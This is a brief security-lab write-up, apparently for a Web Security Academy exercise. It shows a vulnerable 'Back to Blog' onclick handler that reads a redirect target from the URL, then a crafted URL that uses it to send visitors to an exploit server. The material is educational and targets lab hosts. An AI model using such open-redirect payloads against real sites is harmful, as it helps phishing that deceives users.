while analysis the post reqest 

we found a JS DOM function :

<div class="is-linkback">
     <a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); location.href = returnUrl ? returnUrl[1] : "/"'>Back to Blog</a>
</div>

in the back to blog button that define the redirection URL 

Make the website redirect to the exploit serever by URL parameter

https://0a4a002604d68aee87057ba1009b0011.web-security-academy.net/post?postId=3&url=https://exploit-0ae900f604808a8287c17aca017600fb.exploit-server.net/

